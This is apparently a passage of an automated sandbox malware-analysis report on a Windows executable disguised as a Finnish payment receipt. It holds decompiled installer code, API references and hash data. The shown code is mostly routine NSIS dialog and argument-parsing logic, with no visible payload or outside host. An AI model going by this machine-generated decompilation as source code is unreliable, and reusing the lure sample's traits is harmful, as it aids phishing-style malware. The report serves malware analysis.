                                                                                                                      							_t87 = E0040678A("true");
                                                                                                                      							_v16 = _t87;
                                                                                                                      							if(_t87 == 0) {
                                                                                                                      								L30:
                                                                                                                      								E004063B0(0x4216f8, _t146);
                                                                                                                      								_t89 = E00405D2C(0x4216f8);
                                                                                                                      								_t158 = 0;
                                                                                                                      								if(_t89 != 0) {
                                                                                                                      									 *_t89 = 0;
                                                                                                                      								}
                                                                                                                      								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                      									goto L35;
                                                                                                                      								} else {
                                                                                                                      									_t169 = 0x400;
                                                                                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                      									asm("cdq");
                                                                                                                      									_v48 = _t109;
                                                                                                                      									_v44 = _t156;
                                                                                                                      									_v12 = 1;
                                                                                                                      									goto L36;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t159 = 0;
                                                                                                                      								if(0 == 0x4216f8) {
                                                                                                                      									goto L30;
                                                                                                                      								} else {
                                                                                                                      									goto L26;
                                                                                                                      								}
                                                                                                                      								while(1) {
                                                                                                                      									L26:
                                                                                                                      									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
                                                                                                                      									if(_t114 != 0) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									if(_t159 != 0) {
                                                                                                                      										 *_t159 =  *_t159 & _t114;
                                                                                                                      									}
                                                                                                                      									_t160 = E00405CCD(0x4216f8);
                                                                                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                      									_t159 = _t160;
                                                                                                                      									 *_t159 = 0x5c;
                                                                                                                      									if(_t159 != 0x4216f8) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										goto L30;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								_t150 = _v44;
                                                                                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                      								_v44 = _t150 >> 0xa;
                                                                                                                      								_v12 = 1;
                                                                                                                      								_t158 = 0;
                                                                                                                      								__eflags = 0;
                                                                                                                      								L35:
                                                                                                                      								_t169 = 0x400;
                                                                                                                      								L36:
                                                                                                                      								_t95 = E00404CB1(5);
                                                                                                                      								if(_v12 != _t158) {
                                                                                                                      									_t197 = _v44;
                                                                                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                      										_v8 = 2;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
                                                                                                                      									E00404C99(0x3ff, 0xfffffffb, _t95);
                                                                                                                      									if(_v12 == _t158) {
                                                                                                                      										SetDlgItemTextW(_a4, _t169, 0x4216e8);
                                                                                                                      									} else {
                                                                                                                      										E00404BD0(_t169, 0xfffffffc, _v48, _v44);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								_t96 = _v8;
                                                                                                                      								 *0x42a304 = _t96;
                                                                                                                      								if(_t96 == _t158) {
                                                                                                                      									_v8 = E0040140B(7);
                                                                                                                      								}
                                                                                                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                                                      									_v8 = _t158;
                                                                                                                      								}
                                                                                                                      								E00404367(0 | _v8 == _t158);
                                                                                                                      								if(_v8 == _t158 &&  *0x423718 == _t158) {
                                                                                                                      									E0040476D();
                                                                                                                      								}
                                                                                                                      								 *0x423718 = _t158;
                                                                                                                      								goto L53;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t186 = _a8 - 0x405;
                                                                                                                      						if(_a8 != 0x405) {
                                                                                                                      							goto L53;
                                                                                                                      						}
                                                                                                                      						goto L22;
                                                                                                                      					}
                                                                                                                      					_t118 = _a12 & 0x0000ffff;
                                                                                                                      					if(_t118 != 0x3fb) {
                                                                                                                      						L12:
                                                                                                                      						if(_t118 == 0x3e9) {
                                                                                                                      							_t152 = 7;
                                                                                                                      							memset( &_v76, 0, _t152 << 2);
                                                                                                                      							_v80 = _t167;
                                                                                                                      							_v72 = 0x423728;
                                                                                                                      							_v60 = E00404B6A;
                                                                                                                      							_v56 = _t146;
                                                                                                                      							_v68 = E004063D2(_t146, 0x423728, _t167, 0x421f00, _v12);
                                                                                                                      							_t122 =  &_v80;
                                                                                                                      							_v64 = 0x41;
                                                                                                                      							__imp__SHBrowseForFolderW(_t122);
                                                                                                                      							if(_t122 == 0) {
                                                                                                                      								_a8 = 0x40f;
                                                                                                                      							} else {
                                                                                                                      								__imp__CoTaskMemFree(_t122);
                                                                                                                      								E00405C81(_t146);
                                                                                                                      								_t125 =  *((intOrPtr*)( *0x42a254 + 0x11c));
                                                                                                                      								if( *((intOrPtr*)( *0x42a254 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost") {
                                                                                                                      									E004063D2(_t146, 0x423728, _t167, 0, _t125);
                                                                                                                      									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
                                                                                                                      										lstrcatW(_t146, 0x4281e0);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								 *0x423718 =  *0x423718 + 1;
                                                                                                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                                                                      						goto L53;
                                                                                                                      					}
                                                                                                                      					_a8 = 0x40f;
                                                                                                                      					goto L12;
                                                                                                                      				} else {
                                                                                                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                                                      					if(E00405CF8(_t146) != 0 && E00405D2C(_t146) == 0) {
                                                                                                                      						E00405C81(_t146);
                                                                                                                      					}
                                                                                                                      					 *0x429218 = _t167;
                                                                                                                      					SetWindowTextW(_t166, _t146);
                                                                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                      					_push("true");
                                                                                                                      					E00404345(_t167);
                                                                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                      					_push(0x14);
                                                                                                                      					E00404345(_t167);
                                                                                                                      					E0040437A(_t166);
                                                                                                                      					_t138 = E0040678A(7);
                                                                                                                      					if(_t138 == 0) {
                                                                                                                      						L53:
                                                                                                                      						return E004043AC(_a8, _a12, _a16);
                                                                                                                      					} else {
                                                                                                                      						 *_t138(_t166, "true");
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}













































                                                                                                                      0x00404814
                                                                                                                      0x0040481a
                                                                                                                      0x00404820
                                                                                                                      0x0040482d
                                                                                                                      0x0040483b
                                                                                                                      0x0040483e
                                                                                                                      0x00404846
                                                                                                                      0x0040484c
                                                                                                                      0x0040484c
                                                                                                                      0x00404858
                                                                                                                      0x0040485b
                                                                                                                      0x004048c9
                                                                                                                      0x004048d0
                                                                                                                      0x004049a7
                                                                                                                      0x004049ae
                                                                                                                      0x004049bd
                                                                                                                      0x004049bd
                                                                                                                      0x004049c1
                                                                                                                      0x004049cb
                                                                                                                      0x004049d8
                                                                                                                      0x004049da
                                                                                                                      0x004049da
                                                                                                                      0x004049e8
                                                                                                                      0x004049ef
                                                                                                                      0x004049f6
                                                                                                                      0x004049f9
                                                                                                                      0x00404a35
                                                                                                                      0x00404a37
                                                                                                                      0x00404a3d
                                                                                                                      0x00404a42
                                                                                                                      0x00404a46
                                                                                                                      0x00404a48
                                                                                                                      0x00404a48
                                                                                                                      0x00404a64
                                                                                                                      0x00000000
                                                                                                                      0x00404a66
                                                                                                                      0x00404a69
                                                                                                                      0x00404a77
                                                                                                                      0x00404a7d
                                                                                                                      0x00404a7e
                                                                                                                      0x00404a81
                                                                                                                      0x00404a84
                                                                                                                      0x00000000
                                                                                                                      0x00404a84
                                                                                                                      0x004049fb
                                                                                                                      0x004049fd
                                                                                                                      0x00404a01
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00404a03
                                                                                                                      0x00404a03
                                                                                                                      0x00404a10
                                                                                                                      0x00404a15
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00404a19
                                                                                                                      0x00404a1b
                                                                                                                      0x00404a1b
                                                                                                                      0x00404a24
                                                                                                                      0x00404a26
                                                                                                                      0x00404a2b
                                                                                                                      0x00404a2e
                                                                                                                      0x00404a33
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00404a33
                                                                                                                      0x00404a90
                                                                                                                      0x00404a9a
                                                                                                                      0x00404a9d
                                                                                                                      0x00404aa0
                                                                                                                      0x00404aa7
                                                                                                                      0x00404aa7
                                                                                                                      0x00404aa9
                                                                                                                      0x00404aa9
                                                                                                                      0x00404aae
                                                                                                                      0x00404ab0
                                                                                                                      0x00404ab8
                                                                                                                      0x00404abf
                                                                                                                      0x00404ac1
                                                                                                                      0x00404acc
                                                                                                                      0x00404acc
                                                                                                                      0x00404ac1
                                                                                                                      0x00404adc
                                                                                                                      0x00404ae6
                                                                                                                      0x00404aee
                                                                                                                      0x00404b09
                                                                                                                      0x00404af0
                                                                                                                      0x00404af9
                                                                                                                      0x00404af9
                                                                                                                      0x00404aee
                                                                                                                      0x00404b0e
                                                                                                                      0x00404b13
                                                                                                                      0x00404b18
                                                                                                                      0x00404b21
                                                                                                                      0x00404b21
                                                                                                                      0x00404b2a
                                                                                                                      0x00404b2c
                                                                                                                      0x00404b2c
                                                                                                                      0x00404b38
                                                                                                                      0x00404b40
                                                                                                                      0x00404b4a
                                                                                                                      0x00404b4a
                                                                                                                      0x00404b4f
                                                                                                                      0x00000000
                                                                                                                      0x00404b4f
                                                                                                                      0x004049f9
                                                                                                                      0x004049b0
                                                                                                                      0x004049b7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004049b7
                                                                                                                      0x004048d6
                                                                                                                      0x004048df
                                                                                                                      0x004048f9
                                                                                                                      0x004048fe
                                                                                                                      0x00404908
                                                                                                                      0x0040490f
                                                                                                                      0x0040491b
                                                                                                                      0x0040491e
                                                                                                                      0x00404921
                                                                                                                      0x00404928
                                                                                                                      0x00404930
                                                                                                                      0x00404933
                                                                                                                      0x00404937
                                                                                                                      0x0040493e
                                                                                                                      0x00404946
                                                                                                                      0x004049a0
                                                                                                                      0x00404948
                                                                                                                      0x00404949
                                                                                                                      0x00404950
                                                                                                                      0x0040495a
                                                                                                                      0x00404962
                                                                                                                      0x0040496f
                                                                                                                      0x00404983
                                                                                                                      0x00404987
                                                                                                                      0x00404987
                                                                                                                      0x00404983
                                                                                                                      0x0040498c
                                                                                                                      0x00404999
                                                                                                                      0x00404999
                                                                                                                      0x00404946
                                                                                                                      0x00000000
                                                                                                                      0x004048fe
                                                                                                                      0x004048ec
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004048f2
                                                                                                                      0x00000000
                                                                                                                      0x0040485d
                                                                                                                      0x0040486a
                                                                                                                      0x00404873
                                                                                                                      0x00404880
                                                                                                                      0x00404880
                                                                                                                      0x00404887
                                                                                                                      0x0040488d
                                                                                                                      0x00404896
                                                                                                                      0x00404899
                                                                                                                      0x0040489c
                                                                                                                      0x004048a4
                                                                                                                      0x004048a7
                                                                                                                      0x004048aa
                                                                                                                      0x004048b0
                                                                                                                      0x004048b7
                                                                                                                      0x004048be
                                                                                                                      0x00404b55
                                                                                                                      0x00404b67
                                                                                                                      0x004048c4
                                                                                                                      0x004048c7
                                                                                                                      0x00000000
                                                                                                                      0x004048c7
                                                                                                                      0x004048be

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                                                                        • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00403464,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00403464,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                        • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00403464,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                                                                        • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                        • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                                                                        • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: (7B$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost$Call
                                                                                                                      • API String ID: 2624150263-757868555
                                                                                                                      • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                      • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                                                                                      • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                      • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E10001B18() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				WCHAR* _v24;
                                                                                                                      				WCHAR* _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				WCHAR* _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				void* _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				WCHAR* _t199;
                                                                                                                      				signed int _t202;
                                                                                                                      				void* _t204;
                                                                                                                      				void* _t206;
                                                                                                                      				WCHAR* _t208;
                                                                                                                      				void* _t216;
                                                                                                                      				struct HINSTANCE__* _t217;
                                                                                                                      				struct HINSTANCE__* _t218;
                                                                                                                      				struct HINSTANCE__* _t220;
                                                                                                                      				signed short _t222;
                                                                                                                      				struct HINSTANCE__* _t225;
                                                                                                                      				struct HINSTANCE__* _t227;
                                                                                                                      				void* _t228;
                                                                                                                      				intOrPtr* _t229;
                                                                                                                      				void* _t240;
                                                                                                                      				signed char _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				struct HINSTANCE__* _t248;
                                                                                                                      				void* _t249;
                                                                                                                      				signed int _t251;
                                                                                                                      				short* _t253;
                                                                                                                      				signed int _t259;
                                                                                                                      				void* _t260;
                                                                                                                      				signed int _t263;
                                                                                                                      				signed int _t266;
                                                                                                                      				signed int _t267;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				void* _t278;
                                                                                                                      				void* _t282;
                                                                                                                      				struct HINSTANCE__* _t284;
                                                                                                                      				signed int _t287;
                                                                                                                      				void _t288;
                                                                                                                      				signed int _t289;
                                                                                                                      				signed int _t301;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed short _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				WCHAR* _t310;
                                                                                                                      				WCHAR* _t312;
                                                                                                                      				WCHAR* _t313;
                                                                                                                      				struct HINSTANCE__* _t314;
                                                                                                                      				void* _t316;
                                                                                                                      				signed int _t318;
                                                                                                                      				void* _t319;
                                                                                                                      
                                                                                                                      				_t284 = 0;
                                                                                                                      				_v32 = 0;
                                                                                                                      				_v36 = 0;
                                                                                                                      				_v16 = 0;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v40 = 0;
                                                                                                                      				_t319 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_t199 = E1000121B();
                                                                                                                      				_v24 = _t199;
                                                                                                                      				_v28 = _t199;
                                                                                                                      				_v44 = E1000121B();
                                                                                                                      				_t309 = E10001243();
                                                                                                                      				_v52 = _t309;
                                                                                                                      				_v12 = _t309;
                                                                                                                      				while(1) {
                                                                                                                      					_t202 = _v32;
                                                                                                                      					_v56 = _t202;
                                                                                                                      					if(_t202 != _t284 && _t319 == _t284) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					_t308 =  *_t309;
                                                                                                                      					_t287 = _t308 & 0x0000ffff;
                                                                                                                      					_t204 = _t287 - _t284;
                                                                                                                      					if(_t204 == 0) {
                                                                                                                      						_t33 =  &_v32;
                                                                                                                      						 *_t33 = _v32 | 0xffffffff;
                                                                                                                      						__eflags =  *_t33;
                                                                                                                      						L17:
                                                                                                                      						_t206 = _v56 - _t284;
                                                                                                                      						if(_t206 == 0) {
                                                                                                                      							__eflags = _t319 - _t284;
                                                                                                                      							 *_v28 = _t284;
                                                                                                                      							if(_t319 == _t284) {
                                                                                                                      								_t319 = GlobalAlloc(0x40, 0x1ca4);
                                                                                                                      								 *(_t319 + 0x1010) = _t284;
                                                                                                                      								 *(_t319 + 0x1014) = _t284;
                                                                                                                      							}
                                                                                                                      							_t288 = _v36;
                                                                                                                      							_t43 = _t319 + 8; // 0x8
                                                                                                                      							_t208 = _t43;
                                                                                                                      							_t44 = _t319 + 0x808; // 0x808
                                                                                                                      							_t310 = _t44;
                                                                                                                      							 *_t319 = _t288;
                                                                                                                      							_t289 = _t288 - _t284;
                                                                                                                      							__eflags = _t289;
                                                                                                                      							 *_t208 = _t284;
                                                                                                                      							 *_t310 = _t284;
                                                                                                                      							 *(_t319 + 0x1008) = _t284;
                                                                                                                      							 *(_t319 + 0x100c) = _t284;
                                                                                                                      							 *(_t319 + 4) = _t284;
                                                                                                                      							if(_t289 == 0) {
                                                                                                                      								__eflags = _v28 - _v24;
                                                                                                                      								if(_v28 == _v24) {
                                                                                                                      									goto L39;
                                                                                                                      								}
                                                                                                                      								_t316 = 0;
                                                                                                                      								GlobalFree(_t319);
                                                                                                                      								_t319 = E10001311(_v24);
                                                                                                                      								__eflags = _t319 - _t284;
                                                                                                                      								if(_t319 == _t284) {
                                                                                                                      									goto L39;
                                                                                                                      								} else {
                                                                                                                      									goto L32;
                                                                                                                      								}
                                                                                                                      								while(1) {
                                                                                                                      									L32:
                                                                                                                      									_t240 =  *(_t319 + 0x1ca0);
                                                                                                                      									__eflags = _t240 - _t284;
                                                                                                                      									if(_t240 == _t284) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									_t316 = _t319;
                                                                                                                      									_t319 = _t240;
                                                                                                                      									__eflags = _t319 - _t284;
                                                                                                                      									if(_t319 != _t284) {
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t316 - _t284;
                                                                                                                      								if(_t316 != _t284) {
                                                                                                                      									 *(_t316 + 0x1ca0) = _t284;
                                                                                                                      								}
                                                                                                                      								_t241 =  *(_t319 + 0x1010);
                                                                                                                      								__eflags = _t241 & 0x00000008;
                                                                                                                      								if((_t241 & 0x00000008) == 0) {
                                                                                                                      									_t242 = _t241 | 0x00000002;
                                                                                                                      									__eflags = _t242;
                                                                                                                      									 *(_t319 + 0x1010) = _t242;
                                                                                                                      								} else {
                                                                                                                      									_t319 = E1000158F(_t319);
                                                                                                                      									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                                                                                                      								}
                                                                                                                      								goto L39;
                                                                                                                      							} else {
                                                                                                                      								_t301 = _t289 - 1;
                                                                                                                      								__eflags = _t301;
                                                                                                                      								if(_t301 == 0) {
                                                                                                                      									L28:
                                                                                                                      									lstrcpyW(_t208, _v44);
                                                                                                                      									L29:
                                                                                                                      									lstrcpyW(_t310, _v24);
                                                                                                                      									L39:
                                                                                                                      									_v12 = _v12 + 2;
                                                                                                                      									_v28 = _v24;
                                                                                                                      									L63:
                                                                                                                      									if(_v32 != 0xffffffff) {
                                                                                                                      										_t309 = _v12;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								_t302 = _t301 - 1;
                                                                                                                      								__eflags = _t302;
                                                                                                                      								if(_t302 == 0) {
                                                                                                                      									goto L29;
                                                                                                                      								}
                                                                                                                      								__eflags = _t302 != 1;
                                                                                                                      								if(_t302 != 1) {
                                                                                                                      									goto L39;
                                                                                                                      								}
                                                                                                                      								goto L28;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t206 != 1) {
                                                                                                                      							goto L39;
                                                                                                                      						}
                                                                                                                      						_t248 = _v16;
                                                                                                                      						if(_v40 == _t284) {
                                                                                                                      							_t248 = _t248 - 1;
                                                                                                                      						}
                                                                                                                      						 *(_t319 + 0x1014) = _t248;
                                                                                                                      						goto L39;
                                                                                                                      					}
                                                                                                                      					_t249 = _t204 - 0x23;
                                                                                                                      					if(_t249 == 0) {
                                                                                                                      						__eflags = _t309 - _v52;
                                                                                                                      						if(_t309 <= _v52) {
                                                                                                                      							L15:
                                                                                                                      							_v32 = _t284;
                                                                                                                      							_v36 = _t284;
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                                                                                                      						if( *((short*)(_t309 - 2)) != 0x3a) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						__eflags = _v32 - _t284;
                                                                                                                      						if(_v32 == _t284) {
                                                                                                                      							L40:
                                                                                                                      							_t251 = _v32 - _t284;
                                                                                                                      							__eflags = _t251;
                                                                                                                      							if(_t251 == 0) {
                                                                                                                      								__eflags = _t287 - 0x2a;
                                                                                                                      								if(_t287 == 0x2a) {
                                                                                                                      									_v36 = 2;
                                                                                                                      									L61:
                                                                                                                      									_t309 = _v12;
                                                                                                                      									_v28 = _v24;
                                                                                                                      									_t284 = 0;
                                                                                                                      									__eflags = 0;
                                                                                                                      									L62:
                                                                                                                      									_t318 = _t309 + 2;
                                                                                                                      									__eflags = _t318;
                                                                                                                      									_v12 = _t318;
                                                                                                                      									goto L63;
                                                                                                                      								}
                                                                                                                      								__eflags = _t287 - 0x2d;
                                                                                                                      								if(_t287 == 0x2d) {
                                                                                                                      									L131:
                                                                                                                      									__eflags = _t308 - 0x2d;
                                                                                                                      									if(_t308 != 0x2d) {
                                                                                                                      										L134:
                                                                                                                      										_t253 = _t309 + 2;
                                                                                                                      										__eflags =  *_t253 - 0x3a;
                                                                                                                      										if( *_t253 != 0x3a) {
                                                                                                                      											L141:
                                                                                                                      											_v28 =  &(_v28[0]);
                                                                                                                      											 *_v28 = _t308;
                                                                                                                      											goto L62;
                                                                                                                      										}
                                                                                                                      										__eflags = _t308 - 0x2d;
                                                                                                                      										if(_t308 == 0x2d) {
                                                                                                                      											goto L141;
                                                                                                                      										}
                                                                                                                      										_v36 = 1;
                                                                                                                      										L137:
                                                                                                                      										_v12 = _t253;
                                                                                                                      										__eflags = _v28 - _v24;
                                                                                                                      										if(_v28 <= _v24) {
                                                                                                                      											 *_v44 = _t284;
                                                                                                                      										} else {
                                                                                                                      											 *_v28 = _t284;
                                                                                                                      											lstrcpyW(_v44, _v24);
                                                                                                                      										}
                                                                                                                      										goto L61;
                                                                                                                      									}
                                                                                                                      									_t253 = _t309 + 2;
                                                                                                                      									__eflags =  *_t253 - 0x3e;
                                                                                                                      									if( *_t253 != 0x3e) {
                                                                                                                      										goto L134;
                                                                                                                      									}
                                                                                                                      									_v36 = 3;
                                                                                                                      									goto L137;
                                                                                                                      								}
                                                                                                                      								__eflags = _t287 - 0x3a;
                                                                                                                      								if(_t287 != 0x3a) {
                                                                                                                      									goto L141;
                                                                                                                      								}
                                                                                                                      								goto L131;
                                                                                                                      							}
                                                                                                                      							_t259 = _t251 - 1;
                                                                                                                      							__eflags = _t259;
                                                                                                                      							if(_t259 == 0) {
                                                                                                                      								L74:
                                                                                                                      								_t260 = _t287 - 0x22;
                                                                                                                      								__eflags = _t260 - 0x55;
                                                                                                                      								if(_t260 > 0x55) {
                                                                                                                      									goto L61;
                                                                                                                      								}
                                                                                                                      								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                                                                                      									case 0:
                                                                                                                      										__ecx = _v24;
                                                                                                                      										__edi = _v12;
                                                                                                                      										while(1) {
                                                                                                                      											__edi = __edi + 1;
                                                                                                                      											__edi = __edi + 1;
                                                                                                                      											_v12 = __edi;
                                                                                                                      											__ax =  *__edi;
                                                                                                                      											__eflags = __ax - __dx;
                                                                                                                      											if(__ax != __dx) {
                                                                                                                      												goto L116;
                                                                                                                      											}
                                                                                                                      											L115:
                                                                                                                      											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                                                      											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                                                      												L120:
                                                                                                                      												 *__ecx =  *__ecx & 0x00000000;
                                                                                                                      												__ebx = E1000122C(_v24);
                                                                                                                      												goto L91;
                                                                                                                      											}
                                                                                                                      											L116:
                                                                                                                      											__eflags = __ax;
                                                                                                                      											if(__ax == 0) {
                                                                                                                      												goto L120;
                                                                                                                      											}
                                                                                                                      											__eflags = __ax - __dx;
                                                                                                                      											if(__ax == __dx) {
                                                                                                                      												__edi = __edi + 1;
                                                                                                                      												__edi = __edi + 1;
                                                                                                                      												__eflags = __edi;
                                                                                                                      											}
                                                                                                                      											__ax =  *__edi;
                                                                                                                      											 *__ecx =  *__edi;
                                                                                                                      											__ecx = __ecx + 1;
                                                                                                                      											__ecx = __ecx + 1;
                                                                                                                      											__edi = __edi + 1;
                                                                                                                      											__edi = __edi + 1;
                                                                                                                      											_v12 = __edi;
                                                                                                                      											__ax =  *__edi;
                                                                                                                      											__eflags = __ax - __dx;
                                                                                                                      											if(__ax != __dx) {
                                                                                                                      												goto L116;
                                                                                                                      											}
                                                                                                                      											goto L115;
                                                                                                                      										}
                                                                                                                      									case 1:
                                                                                                                      										_v8 = 1;
                                                                                                                      										goto L61;
                                                                                                                      									case 2:
                                                                                                                      										_v8 = _v8 | 0xffffffff;
                                                                                                                      										goto L61;
                                                                                                                      									case 3:
                                                                                                                      										_v8 = _v8 & 0x00000000;
